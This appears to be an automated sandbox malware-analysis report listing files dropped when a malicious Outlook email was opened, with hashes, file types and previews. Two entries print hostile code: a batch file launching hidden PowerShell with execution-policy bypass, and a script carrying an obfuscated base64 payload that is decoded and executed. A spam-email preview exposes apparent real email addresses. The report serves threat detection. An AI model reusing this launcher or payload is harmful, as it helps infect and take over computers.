                          SHA-512:A03CC06DE5068826650C9200806B0FF18B4AFCF12D1E69671DE072F1C4A6301029B960CF008714A16D9E1F1A5D4F77901AE487BA77124797E409DFA67E2FF81F
                          Malicious:false
                          Reputation:unknown
                          Preview:..-......................k...A.1uQ[.y..q..D.....-......................k...A.1uQ[.y..q..D...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Office\OTele\outlook.exe.db-wal

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:SQLite Write-Ahead Log, version 3007000
                          Category:modified
                          Size (bytes):45352
                          Entropy (8bit):0.39375634669262305
                          Encrypted:false
                          SSDEEP:
                          MD5:49AF04B0AEAE9283DDBDB61EE6EC0B45
                          SHA1:0F8872B219CE581383315FD301EB2D882C35F4C7
                          SHA-256:71B8997697B86D88AD4C39FE4A75F063BB3408305EB4A05D95EEB326A20AB903
                          SHA-512:B111982759B9FBCC8282D0C50D5FE3E6B42A0B3BE0FE84586AF0045423E180354D2B266DBB941EB51941DCE1D6E1BDB1125B95C1FEA40563D398F7ADDE570CB0
                          Malicious:false
                          Reputation:unknown
                          Preview:7....-..........uQ[.y..BT.............uQ[.y........SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{DA212099-9A6E-4BB4-B208-6E3EFE5B8393}.tmp

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):3604
                          Entropy (8bit):3.049990037469824
                          Encrypted:false
                          SSDEEP:
                          MD5:C0BABBCF22BB28A9FA44FCE4020F0DA5
                          SHA1:26342B866FCEDBD24A4CD3B4832AD73746141446
                          SHA-256:0643206BF5A02345C7D4CE5EF63E07104782990F3550C1547D684A70CD8C8CFC
                          SHA-512:28E4691742B4DB9108DA4A5F82C8D4998B5EC7B8C7B6B4214AF38B0830A384C43CF48114E40A96CC7C418D9F7FD56F0939F4A30F4FD3F541AB19084C1860BFC7
                          Malicious:false
                          Reputation:unknown
                          Preview:....S.P.A.M. .?.....D.a.:. .g.i.a.n.l.u.c.a...m.u.c.c.i.o.l.o.8.0.@.p.e.c...i.t. .<.g.i.a.n.l.u.c.a...m.u.c.c.i.o.l.o.8.0.@.p.e.c...i.t.>. ...I.n.v.i.a.t.o.:. .l.u.n.e.d... .1.8. .n.o.v.e.m.b.r.e. .2.0.2.4. .0.2.:.1.0...A.:. .C.u.z.z.i.o.l. .b.e.v.e.r.a.g.e. .s...r...l... .<.c.u.z.z.i.o.l.b.e.v.e.r.a.g.e.s.r.l.@.p.e.c...i.t.>...O.g.g.e.t.t.o.:. .................................................................................................................................................................................................8...P...T...................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):19253
                          Entropy (8bit):5.005843281975463
                          Encrypted:false
                          SSDEEP:
                          MD5:0EBE1B1B3D46E15D27180236D843E5A0
                          SHA1:349D843E6829B7FF9A0A78BF63484F18193F5441
                          SHA-256:BCFD0A64AC8A082F90C720B273594F7AD149275D04A0F165E967F7DF922F1D99
                          SHA-512:4B685C5512A2BE6707EC1659967F5467DF7889C2A8A7B4A0D4A6122414CBB40079777AA760526760DB92C713DE2C80B1D35E19FD3F8824DA255C01791E7E4C33
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):10736
                          Entropy (8bit):5.379101249454861
                          Encrypted:false
                          SSDEEP:
                          MD5:9301A33DCAA58EAFBC48DC660F16811D
                          SHA1:1F47843EA912D476CE061DE9154310CE1FC50E7F
                          SHA-256:6FA652EEE5E03ABA03B62E091D94B3067BD7308DD6853652D67AE5F8533421FA
                          SHA-512:079D2B911E0B68F06071E6CEE36A8B2A81F266B653D3F5A7B08058C5D926138F7DF9C5999929BC5C36F9860A91C2749FEFBA9E10B67621112C305E1D81616952
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e................................................@..........H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....u.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.................................................V.@.Ig@.Eg@.:5@.95@...@.X.@.J.@.Z.@.^.@.aT@.[T@..T@..S@.{T@..S@..T@..S@._.@..T@..T@.VX@.UX@./T@.

                          C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1731923076682548400_98B18355-B626-40CD-80E8-FBA6DB9C1AF8.log

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):20971520
                          Entropy (8bit):0.009670002543437096
                          Encrypted:false
                          SSDEEP:
                          MD5:AE31E369B3CFB1DBFA309D8310122BA4
                          SHA1:0480EDF04CA8493AAE7C3C36CACFE27215E8E7F9
                          SHA-256:34DC606E66C5CF2A577DB4D7D08389D21F3D091887348D54EBEF50C0139356D9
                          SHA-512:34684D88D7C5C7C8266D881668F2F6E328CDD80D3416A50C12A69668026E89CB4EE3B802A392EF3607C726D03532CB21EEA72290F78924B87AB05E6E46D9B1C9
                          Malicious:false
                          Reputation:unknown
                          Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/18/2024 09:44:36.710.OUTLOOK (0xB88).0x16A8.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.System.GracefulExit.GracefulAppExitDesktop","Flags":33777014402039809,"InternalSequenceNumber":17,"Time":"2024-11-18T09:44:36.710Z","Data.PreviousAppMajor":16,"Data.PreviousAppMinor":0,"Data.PreviousAppBuild":16827,"Data.PreviousAppRevision":20130,"Data.PreviousSessionId":"CAA672D9-4C24-4A61-BD58-E96887DB2895","Data.PreviousSessionInitTime":"2024-11-18T09:44:20.614Z","Data.PreviousSessionUninitTime":"2024-11-18T09:44:23.755Z","Data.SessionFlags":2147483652,"Data.InstallMethod":0,"Data.OfficeUILang":1033,"Data.PreviousBuild":"Unknown","Data.EcsETag":"\"\"","Data.ProcessorArchitecture":"x64"}...11/18/2024 09:44:36.758.OUTLOOK (0xB88).0x454.Microsoft Outlook.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":22,"T

                          C:\Users\user\AppData\Local\Temp\Diagnostics\OUTLOOK\App1731923076683571300_98B18355-B626-40CD-80E8-FBA6DB9C1AF8.log

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):20971520
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                          SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                          SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                          SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                          Malicious:false
                          Reputation:unknown
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241118T0444360487-2952.etl

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:modified
                          Size (bytes):114688
                          Entropy (8bit):4.689480602989428
                          Encrypted:false
                          SSDEEP:
                          MD5:8FAF8E19CC7E29DD1D2BBBA939F5B9D8
                          SHA1:B7FD80EC56E4384E2F377E94541ACD9224908CC1
                          SHA-256:6B2C18BB7C052285F0A34B86D247FBAAC7AC304824793732D01794C7383B6D51
                          SHA-512:53DEE47146FBDDD1CBBB94302D11A2EB4B8645546A60EC4BAF89B4D34A9A960B27E2FEE1CCD1D7DAB97BB16068F4CBF494BE16B409219C4A1486461A9171A5DE
                          Malicious:false
                          Reputation:unknown
                          Preview:............................................................................`..............z.9..................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................(..Y.............z.9..........v.2._.O.U.T.L.O.O.K.:.b.8.8.:.4.d.6.c.f.b.1.5.b.4.6.2.4.c.f.6.b.a.0.2.e.6.5.6.7.9.c.8.5.6.7.8...C.:.\.U.s.e.r.s.\.n.o.r.d.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.4.1.1.1.8.T.0.4.4.4.3.6.0.4.8.7.-.2.9.5.2...e.t.l.......P.P............z.9..........................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Local\Temp\~DF2498A1E4E367F63D.TMP

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):163840
                          Entropy (8bit):0.3504357971771905
                          Encrypted:false
                          SSDEEP:
                          MD5:171D8C3FE5A4808BE48B722C56CBA80E
                          SHA1:674F5D6B619A6F3B8DCF1F017BDA6DBADF4955E7
                          SHA-256:D21C83F8AB5C9487B4B148D6740200DFA373AE856BA1D2B2C187A1F1A3840F3E
                          SHA-512:5348D77AEB4852F5C2F57D7A7DC297052E3102EC9EFB804B263FCFE43456678492E011051A79C9281D09F79EF55E9FF2F581A1A77E442280DC8999558009013B
                          Malicious:false
                          Reputation:unknown
                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\1Q5Mu4aI.bat

                          Download File
                          Process:C:\Windows\System32\wscript.exe
                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):127
                          Entropy (8bit):5.0460351365943525
                          Encrypted:false
                          SSDEEP:
                          MD5:A42EC7EC3C55CF87A3752F85AC004F67
                          SHA1:58A7C90237C3B93F5D576EE4C94D51B7742E906D
                          SHA-256:1A94CA03E4166A116E78906D5F44DF2BDAAA1E75621B8D70E43A8026F868C92D
                          SHA-512:93919B7E6A61A505AB104920C718A6B1F0A775F0CD69B09027E22CB1D34ED46D5325B5DADD4CEECFA05CA77B7506B957D4252AD9FB4273BB9A2022D17F50935A
                          Malicious:true
                          Reputation:unknown
                          Preview:@echo off..powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1"..exit 0..

                          C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1

                          Download File
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with very long lines (3344), with no line terminators
                          Category:dropped
                          Size (bytes):3344
                          Entropy (8bit):5.800905293758026
                          Encrypted:false
                          SSDEEP:
                          MD5:8981B86CEADED64BEBE3D2FBE322D235
                          SHA1:FA4D7A7D544523CF1D0974A2779C28DFBA3F9467
                          SHA-256:2D762504F9247A867A3DF449A97A1C344A802E84785BF1A4DF4E557DC8F572EA
                          SHA-512:442F7DAC6BE293CD1ACFB452B73487ED462DD61C9220359A012B68A33F515CF0F6FB59FC1238EC6DF55640F7B83EA47413A138CCC5DF01BFD9A248C20114196A
                          Malicious:true
                          Yara Hits:
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\1Q5Mu4aI.ps1, Author: Joe Security
                          Reputation:unknown
                          Preview:powershell -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JEVycm9yQWN0aW9uUHJlZmVyZW5jZSA9ICJDb250aW51ZSIKCiR4VGN3aUNQOW15QWhlZ0NzU3lZdEdaeDlpNkk5aHRtM1pXWkY0ZkVqdDNMVmdScVRIajZhaDZpWUw2ZUVqZ0Z0NXpoVjdwTWNXZDNtOHE4ckswWTd6cnNMViA9ICQoLWpvaW4gKCg2NS4uOTApICsgKDk3Li4xMjIpIHwgR2V0LVJhbmRvbSAtQ291bnQgNSB8ICUge1tjaGFyXSRffSkpOwokcWtxakh2YnlBQzBzZmdleUp3MDB0c1lMSElMWlpvT3djWkpLdUVvWXhmWWtLeWtSYW5pNWpaZ0trWU9uSzdCYVlJcjFFYXg1d1BIdVhObzlFZ0JiZFlUaU1qY01HRiA9IFtpbnRdKEdldC1EYXRlIC1Gb3JtYXQgSEgpOwokbHBoRjBrVHpGc1h4cWdEamNVNThiQ0FxTWViSkZtT3Q1N0FvZFBJS3NORnZOY3J0bmdDM3lsY25oVWdHTjJhemExcVJuQlprVTE4Y0ZGZDUgPSBbaW50XShHZXQtRGF0ZSAtRm9ybWF0IG1tKTsKJGxwaEYwa1R6RnNYeHFnRGpjVTU4YkNBcU1lYkpGbU90NTdBb2RQSUtzTkZ2TmNydG5nQzN5bGNuaFVnR04yYXphMXFSbkJaa1UxOGNGRmQ1QWRkID0gMzsKSWYgKCRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdDU3QW9kUElLc05Gdk5jcnRuZ0MzeWxjbmhVZ0dOMmF6YTFxUm5CWmtVMThjRkZkNSArICRscGhGMGtUekZzWHhxZ0RqY1U1OGJDQXFNZWJKRm1PdD

                          C:\Users\user\AppData\Roaming\Microsoft\Office\MSO3072.acl

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):30
                          Entropy (8bit):1.2389205950315936
                          Encrypted:false
                          SSDEEP:
                          MD5:20603F35D4A8E3343E0886D193CA4A19
                          SHA1:FFCE9D44386FA188F407EFC95A95ED45F69395A1
                          SHA-256:C8E62E465B724F176FC4D68FA22AFC96EEF196DEA9DDBD4315F139C178BCDA52
                          SHA-512:B3430DEFD7FD0F1AEA939BBA32AEAC11C1C3D4EFBEE3B90FCF4CB70DFD5CADFB87B0D21FBB430CF390EF2D821EAC0A46779113ADECC7D708EA2B9665F8A2FA04
                          Malicious:false
                          Reputation:unknown
                          Preview:....j.........................

                          C:\Users\user\AppData\Roaming\Microsoft\Outlook\NoEmail.srs

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Composite Document File V2 Document, Cannot read section info
                          Category:dropped
                          Size (bytes):16384
                          Entropy (8bit):0.66982247289502
                          Encrypted:false
                          SSDEEP:
                          MD5:70C134159528B40CA22F2ACDF4DD1230
                          SHA1:200C615F86DB701537CD4876C84BF63F7DD62A81
                          SHA-256:B4857FD2C51ED4FA5885989967DE8E76493C33B3F5073B04398D535105418F93
                          SHA-512:4C67D05933CF9BC328F06298DB231E1E1A57236FC59D75ADAE18D39F1ADA026523B0913F65D189742A46A58E00E7FB03F83F8F073A63CE86FBB01050258526A4
                          Malicious:true
                          Reputation:unknown
                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                          Download File
                          Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):16
                          Entropy (8bit):2.771782221599798
                          Encrypted:false
                          SSDEEP:
                          MD5:3B16E9648F3B7DAFA340BCC881915BFB
                          SHA1:F8C0B28679B0C71FAAE77BE7CE81FE796E7E6E51
                          SHA-256:0114438C2EB5EB5DCEF887D31DC2D717F237254E8E83AD1E949660BF41C6AD45
                          SHA-512:53A514B95AE45B998B334FD7CD4A6E2A31A7630795F852A659083D6C32BFA467BDA04C96B7FF7B130841BE1B96AD5084E939ECFBABE6C2C61E35207239E9C685
                          Malicious:false
                          Reputation:unknown
                          Preview:..n.o.r.d.i.....

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):3.975256228807088
                          Encrypted:false
                          SSDEEP:
                          MD5:DFD25F54949C0F3A06F21FB3C09551E1
                          SHA1:965DDA0A1681B2ED9F669620C24685DD9FAE48C2
                          SHA-256:EE2AD246CC3EB4647F68E0D8A91611AAF15B8F22B82FDCEA3C161D0B71EEE7C2
                          SHA-512:24C646DCE7679CBF34DE9350B2DFA90A38BD12382BD7102B4633136B221925873C73346BA1551A0EDAF6D2A5FBCAADD7931A2F9D8923592C05F00853286E4228
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......(..9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.989950306244693
                          Encrypted:false
                          SSDEEP:
                          MD5:2CD6A75F651A41020BE3563BEE39775A
                          SHA1:36EB49803074555B56488D83785F0546611F8CF9
                          SHA-256:662CB30F612703966223E8E1572CA5DC1DE322D271FC22443172271A25CDB0D8
                          SHA-512:8A77BA85F26D84A693AA406FDAE1628F1DEA7250A708502BCFDAB8F320F9C4C2A6E802A24BE372E105FAB92551B50FE6BEE162867AB473C05D6DDE42C74D24F6
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....@+...9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 09:23:19 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2691
                          Entropy (8bit):3.9977150031221433
                          Encrypted:false
                          SSDEEP:
                          MD5:3402C893E605A07E4926B8468194D484
                          SHA1:FA4AFF94465F620C487E00E216F9615D009B1FD6
                          SHA-256:01F4497594F3AC253DDD1F68947E805323113BFA756665B94350C470732CCBB0
                          SHA-512:986DCBCD41545F112E182F05ADBF6DBDA1CE90E82DD3D45EE52AFA39961975E0045F3FEE28B36910B2855A838035ACD83A1FC1C3E4780DC0A499363983A0B6A3
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,....?.4 ?.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.R.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.9899153180013247
                          Encrypted:false
                          SSDEEP:
                          MD5:ADAEE08263D1B2C6D9981F66C18507B2
                          SHA1:0DB84C2F0C08E825A32567F79102877A46D0894E
                          SHA-256:6FE870D7064F54949D99269B34D77FEE4CBCC5C60BD8B90548CB1A47F1F66F12
                          SHA-512:D816339C00DC02159CA89DF9A5E7B3FB1FDE463E1DB967DE5E45BA334E5070E3353E350E00BA75530BF0E84D330EBE2C3AA4E4C3A8CA28F27BC4665363FC5A70
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.........9......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.R..PROGRA~1..t......O.IrY.M....B...............J......Y..P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VrY.M....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.R..Chrome..>......CW.VrY.M....M......................pd.C.h.r.o.m.e.....`.1.....FW.R..APPLIC~1..H......CW.VrY.M...........................pd.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VrY.M.....#......................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........n..F.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                          Download File
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Nov 18 08:44:43 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.975977254126674
                          Encrypted:false
                          SSDEEP:
                          MD5:6A0FAFC707EF6432AB4F76CD8856698D
                          SHA1:E009755B0047ABBAF2FE8AD17C69E6D6DA4D42F2
                          SHA-256:687A9025E0EAAE3D2FEA1C00758C77D5BF7B7EBCDA3349ABE9542F88CECABE13
                          SHA-512:DA39787606E79CB7E1D6C2C514622BE9C8901DA93C64C375EE133463C7DB216096191F92051C65E9C60B9CC47B3929143C3A181D40602CC931FBFBA4DC3A3B6B
                          Malicious:false
                          Reputation:unknown
